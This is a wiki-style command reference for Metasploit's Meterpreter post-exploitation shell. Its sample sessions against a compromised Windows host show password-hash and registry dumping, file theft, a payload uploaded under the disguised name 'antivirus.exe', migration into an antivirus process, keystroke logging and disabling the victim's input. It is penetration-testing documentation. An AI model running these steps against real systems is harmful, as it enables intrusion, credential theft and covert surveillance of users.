Metasploit/MeterpreterClient
Meterpreter > shell
Introduction
editTODO - meterpreter introduction.
Getting Started
editCommands
editCore Commands
edit?
editWe can use ? or help to show a list of commands with brief descriptions.
background
editUsing the background command places the current session into the background and brings us back to the Metasploit console without terminating the session. We can begin to interact with the session again by using the sessions Metasploit command.
meterpreter > background msf exploit(handler) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.50.112:443 -> 192.168.50.100:1495 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter >
channel
editTODO Displays information about active channels
close
editTODO Closes a channel
exit
editReturns to the Meterpreter console and closes the active session.
meterpreter > exit [*] Meterpreter session 1 closed. msf exploit(handler) > sessions -l Active sessions =============== No active sessions.
help
editWe can use ? or help to show a list of commands with brief descriptions.
interact
editTODO Interacts with a channel
irb
editWe can start the Interactive Ruby Shell with the irb command, allowing us to use the Ruby scripting language to interact with the compromised system.
To view the API, we need to run the rdoc command from the Metasploit directory, which will create a doc/index.html file that we can open with a browser. View the Rex::Post::Meterpreter section of the API for the relevant section.
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.sys.config.sysinfo()
=> {"OS"=>"Windows XP (Build 2600, Service Pack 2).", "Computer"=>"TARGETLAPTOP"}
migrate
editMeterpreter initially runs inside the exploited process or as its own executable's process in some cases. If that process is stopped for any reason, the Meterpreter session will close, so it is good practice to migrate the session to more stable process such as Windows' explorer.exe.
The following example shows the use of a handful of commands in order to locate a process that the user will not close during his or her session. The commands are:
- ps - Show a list of running processes.
- getpid - Display the process Meterpreter is using, which shows an EXE payload meter-443.exe.
- migrate pid - Move Meterpreter to a new process ID number, where we request the McAfee agent.
- getpid - Display the new process Meterpreter is using, which we verify is the McAfee agent process.
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
220 MPFSrv.exe C:\Program Files\McAfee\MPF\MPFSrv.exe
292 RalinkRegistryWriter.exe C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe
484 WinVNC4.exe C:\Program Files\RealVNC\VNC4\WinVNC4.exe
492 smss.exe \SystemRoot\System32\smss.exe
592 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
636 services.exe C:\WINDOWS\system32\services.exe
648 lsass.exe C:\WINDOWS\system32\lsass.exe
804 svchost.exe C:\WINDOWS\system32\svchost.exe
956 svchost.exe C:\WINDOWS\System32\svchost.exe
1404 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1432 Explorer.EXE C:\WINDOWS\Explorer.EXE
1536 mcagent.exe C:\Program Files\McAfee.com\Agent\mcagent.exe
1616 RaUI.exe C:\Program Files\RALINK\Common\RaUI.exe
1692 meter-443.exe C:\Documents and Settings\Administrator\Desktop\shared\meter-443.exe
1848 McSACore.exe C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
1860 mcmscsvc.exe C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
1884 mcnasvc.exe c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
1996 mcproxy.exe c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
3076 wuauclt.exe C:\WINDOWS\system32\wuauclt.exe
3320 wpabaln.exe C:\WINDOWS\system32\wpabaln.exe
3424 mcsysmon.exe C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
4032 mcshield.exe C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
meterpreter > getpid
Current pid: 1692
meterpreter > migrate 1536
[*] Migrating to 1536...
[*] Migration completed successfully.
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
220 MPFSrv.exe C:\Program Files\McAfee\MPF\MPFSrv.exe
292 RalinkRegistryWriter.exe C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe
484 WinVNC4.exe C:\Program Files\RealVNC\VNC4\WinVNC4.exe
492 smss.exe \SystemRoot\System32\smss.exe
592 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
636 services.exe C:\WINDOWS\system32\services.exe
648 lsass.exe C:\WINDOWS\system32\lsass.exe
744 taskmgr.exe C:\WINDOWS\system32\taskmgr.exe
804 svchost.exe C:\WINDOWS\system32\svchost.exe
956 svchost.exe C:\WINDOWS\System32\svchost.exe
1404 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1432 Explorer.EXE C:\WINDOWS\Explorer.EXE
1536 mcagent.exe C:\Program Files\McAfee.com\Agent\mcagent.exe
1616 RaUI.exe C:\Program Files\RALINK\Common\RaUI.exe
1848 McSACore.exe C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
1860 mcmscsvc.exe C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
1884 mcnasvc.exe c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
1996 mcproxy.exe c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
3076 wuauclt.exe C:\WINDOWS\system32\wuauclt.exe
3320 wpabaln.exe C:\WINDOWS\system32\wpabaln.exe
3424 mcsysmon.exe C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
4032 mcshield.exe C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
meterpreter > getpid
Current pid: 1536
quit
editReturns to the Meterpreter console and closes the active session.
meterpreter > quit [*] Meterpreter session 1 closed. msf exploit(handler) > sessions -l Active sessions =============== No active sessions.
read
editTODO Reads data from a channel
run
editWe can execute a Meterpreter script using the run command. If no path is specified, Meterpreter will search for the script in the scripts/meterpreter/ directory.
In the following example we are running the scripts/meterpreter/scraper.rb script, which pulls some basic information from the target. The information is logged to the ~/.msf3/logs/scraper directory.
meterpreter > run scraper.rb [*] New session on 192.168.50.100:1548... [*] Gathering basic system information... [*] Dumping password hashes... [*] Obtaining the entire registry... [*] Exporting HKCU [*] Downloading HKCU (C:\DOCUME~1\Administrator\LOCALS~1\Temp\xHzyoaiW.reg) [*] Cleaning HKCU [*] Exporting HKLM [*] Downloading HKLM (C:\DOCUME~1\Administrator\LOCALS~1\Temp\JYCDjVMU.reg) [*] Cleaning HKLM [*] Exporting HKCC [*] Downloading HKCC (C:\DOCUME~1\Administrator\LOCALS~1\Temp\uEATxCej.reg) [*] Cleaning HKCC [*] Exporting HKCR [*] Downloading HKCR (C:\DOCUME~1\Administrator\LOCALS~1\Temp\guYOZCzT.reg) [*] Cleaning HKCR [*] Exporting HKU [*] Downloading HKU (C:\DOCUME~1\Administrator\LOCALS~1\Temp\ZNfDGqdB.reg) [*] Cleaning HKU [*] Completed processing on 192.168.50.100:1548...
use
editFor additional commands and functionality we can load Meterpreter extensions with the use command.
In the following example, we would like to use the hashdump command to retrieve password hashes from the target. By using the use priv command we can load the extension that gives us the hashdump command. We can verify this by using ? to list our available commands.
meterpreter > use -l
stdapi
sniffer
incognito
priv
espiameterpreter > use priv
Loading extension priv...success.
meterpreter > ?
<snip>
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
write
editTODO Writes data to a channel
File System Commands
editcat
editThe cat command displays the contents of a single file. As of the time of this writing, the command will throw an error when trying to read an emtpy file.
meterpreter > cat passwords.txt harleydavidson password kidsbirthday
cd
editTo change directory the cd command is used.
The command will accept both back and forward slashes somewhat interchangeably, though using a forward slash seems to work more frequently. "." and ".." are used to access the current and parent directory, respectively, and double-quotes can be used to access directories with spaces in the names.
meterpreter > pwd C:\ meterpreter > cd /"Program Files"/"Internet Explorer" meterpreter > pwd C:\Program Files\Internet Explorer meterpreter > cd ../../"documents and settings"/Administrator/Desktop/ C:\Documents and Settings\Administrator\Desktop
download
editWhen we need to retrieve a file from the target we use the download command, which transfers the specified file into our local working directory. In the event that we need to recursively download an entire directory, we use the download -r command.
meterpreter > download users.txt [*] downloading: users.txt -> users.txt [*] downloaded : users.txt -> users.txt
edit
editTo edit a file using our default text editor we use the edit command. Behind the scenes, Meterpreter will download a copy of the file to a temp directory, then upload the new file when the edit is complete.
meterpreter > edit users.txt
getlwd
editWe can show the current working directory on our local machine by using getlwd (get local working directory), or by using the alias lpwd (local print working directory).
meterpreter > getlwd /home/myusername/Desktop/metasploit meterpreter > lpwd /home/myusername/Desktop/metasploit
getwd
editWe can show the current working directory on the exploited machine by using getwd (get working directory), or by using the alias pwd (print working directory).
meterpreter > getwd C:\Program Files\Internet Explorer meterpreter > pwd C:\Program Files\Internet Explorer
lcd
editTo change the local directory we use the lcd command.
The command only accepts arguments in the same way as your operating system's cd command, so refer to your system's documentation for specific instructions. The following example shows lcd on a Linux system.
meterpreter > lpwd /home/myusername/Desktop/metasploit meterpreter > lcd ../.. meterpreter > lpwd /home/myusername meterpreter > lcd /home/andrer/Desktop/metasploit meterpreter > lpwd /home/myusername/Desktop/metasploit
lpwd
editWe can show the current working directory on our local machine by using lpwd (local print working directory), or by using the alias getlwd (get local working directory).
meterpreter > lpwd /home/myusername/Desktop/metasploit meterpreter > getlwd /home/myusername/Desktop/metasploit
ls
editWe can see both the current working directory and a detailed listing of files in that directory by using the ls command. File listings are given in a format similar to the GNU ls program.
meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop\shared =============================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Wed Dec 31 18:00:00 -0600 1969 . 40777/rwxrwxrwx 0 dir Wed Dec 31 18:00:00 -0600 1969 .. 100777/rwxrwxrwx 14965 fil Wed Dec 31 18:00:00 -0600 1969 meter-443.exe 40777/rwxrwxrwx 0 dir Wed Dec 31 18:00:00 -0600 1969 u3
mkdir
editWe use mkdir to make a new directory on the target system.
meterpreter > mkdir antivirus-update Creating directory: antivirus-update meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ================================================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Wed Dec 31 18:00:00 -0600 1969 . 40777/rwxrwxrwx 0 dir Wed Dec 31 18:00:00 -0600 1969 .. 40777/rwxrwxrwx 0 dir Wed Dec 31 18:00:00 -0600 1969 antivirus-update 40777/rwxrwxrwx 0 dir Wed Dec 31 18:00:00 -0600 1969 shared 40777/rwxrwxrwx 0 dir Wed Dec 31 18:00:00 -0600 1969 working
pwd
editWe can show the current working directory on our local machine by using pwd ( print working directory), or by using the alias getwd (get working directory).
meterpreter > pwd C:\Program Files\Internet Explorer meterpreter > getwd C:\Program Files\Internet Explorer
rmdir
editWe can remove an empty directory with the rmdir command. The command will throw an error if the directory is not empty.
meterpreter > rmdir antivirus-update Removing directory: antivirus-update
upload
editTo send a file to the target system we use the upload command, using the -r switch to recursively upload directories and their contents. In the following example we are uploading a falsely named Meterpreter payload.
meterpreter > upload antivirus.exe [*] uploading : antivirus.exe -> antivirus.exe [*] uploaded : antivirus.exe -> antivirus.exe meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop\antivirus-update ================================================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Wed Dec 31 18:00:00 -0600 1969 . 40777/rwxrwxrwx 0 dir Wed Dec 31 18:00:00 -0600 1969 .. 100777/rwxrwxrwx 10912 fil Wed Dec 31 18:00:00 -0600 1969 antivirus.exe
Networking Commands
editipconfig
editBy using the ipconfig command, or internet protocol configuration, we can view a listing of all network interfaces on the target. Viewing the results for ipconfig is most useful for determining to which networks the target is directly connected.
For example, looking at the following we can see that the target is connected to the 192.168.50.0/24 network, with an internal address of 192.168.50.100.
meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 National Semiconductor DP83815-Based PCI Fast Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0b:cd:30:db:0a IP Address : 192.168.50.100 Netmask : 255.255.255.0
portfwd
editForward a local port to a remote service
route
editView and modify the routing table
System Commands
editexecute
editExecute a command
To execute a command you need to use execute "-f" for file "cmd.exe" application
This will be executed in the background. To check this type ps
execute -f cmd.exe 54124---> process id
getpid
editGet the current process identifier
getuid
editGet the user that the server is running as
kill
editTerminate a process
ps
editThe ps command lists the running processes, and is an important command for a couple reasons. First, it is a good idea for us to be aware of applications and services running on the target in order to have awareness of the system. Secondly, Meterpreter initially runs inside the exploited process or as its own executable's process in some cases. If that process is stopped for any reason, the Meterpreter session will close, so it is good practice to migrate the session to more stable process such as Windows' explorer.exe.
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
284 MPFSrv.exe C:\Program Files\McAfee\MPF\MPFSrv.exe
424 RalinkRegistryWriter.exe C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe
492 smss.exe \SystemRoot\System32\smss.exe
592 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
612 WinVNC4.exe C:\Program Files\RealVNC\VNC4\WinVNC4.exe
636 services.exe C:\WINDOWS\system32\services.exe
648 lsass.exe C:\WINDOWS\system32\lsass.exe
804 svchost.exe C:\WINDOWS\system32\svchost.exe
876 NOTEPAD.EXE C:\WINDOWS\system32\NOTEPAD.EXE
964 svchost.exe C:\WINDOWS\System32\svchost.exe
1348 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1464 Explorer.EXE C:\WINDOWS\Explorer.EXE
1540 mcagent.exe C:\Program Files\McAfee.com\Agent\mcagent.exe
1612 RaUI.exe C:\Program Files\RALINK\Common\RaUI.exe
1840 McSACore.exe C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
1852 mcmscsvc.exe C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
1876 mcnasvc.exe c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
1928 mcproxy.exe c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
1952 mcshield.exe C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
3028 wuauclt.exe C:\WINDOWS\system32\wuauclt.exe
3168 wpabaln.exe C:\WINDOWS\system32\wpabaln.exe
3240 mcsysmon.exe C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
reboot
editBy running the reboot command, we will restart the target system.
meterpreter > reboot Rebooting...
reg
editModify and interact with the remote registry
rev2self
editCalls RevertToSelf() on the remote machine
shutdown
editUsing the shutdown command will shut off the target system.
meterpreter > shutdown Shutting down...
sysinfo
editDuring the post-exploitation phase, one of the earliest commands that we should run is the sysinfo command. Running this command will give us the Computer Name and OS version, which often offers a clue to the purpose of the target system.
meterpreter > sysinfo Computer: TARGETLAPTOP OS : Windows XP (Build 2600, Service Pack 2).
User Interface Commands
editenumdesktops
editTODO List all accessible desktops and window stations
idletime
editUsing the idletime command will return the length of time that the target system's user has been idle.
meterpreter > idletime User has been idle for: 51 secs
keyscan_dump
editWe can capture the keyboard input of the target using the keyscan series of commands. The keyscan_start and keyscan_stop commands will begin and end recording keystrokes respectively, while the keyscan_dump command displays all recorded keystrokes on our client.
meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... This text is actually being typed into the target's keyboard.<Return> meterpreter > keyscan_stop Stopping the keystroke sniffer...
keyscan_start
editWe can capture the keyboard input of the target using the keyscan series of commands. The keyscan_start and keyscan_stop commands will begin and end recording keystrokes respectively, while the keyscan_dump command displays all recorded keystrokes on our client.
meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... This text is actually being typed into the target's keyboard.<Return> meterpreter > keyscan_stop Stopping the keystroke sniffer...
keyscan_stop
editWe can capture the keyboard input of the target using the keyscan series of commands. The keyscan_start and keyscan_stop commands will begin and end recording keystrokes respectively, while the keyscan_dump command displays all recorded keystrokes on our client.
meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... This text is actually being typed into the target's keyboard.<Return> meterpreter > keyscan_stop Stopping the keystroke sniffer...
setdesktop
editTODO Move to a different workstation and desktop
uictl
editUsing the uictl command we have the ability to disable keyboard and mouse input on the target.
meterpreter > uictl disable mouse Disabling mouse... meterpreter > uictl enable mouse Enabling mouse... meterpreter > uictl disable keyboard Disabling keyboard... meterpreter > uictl enable keyboard Enabling keyboard...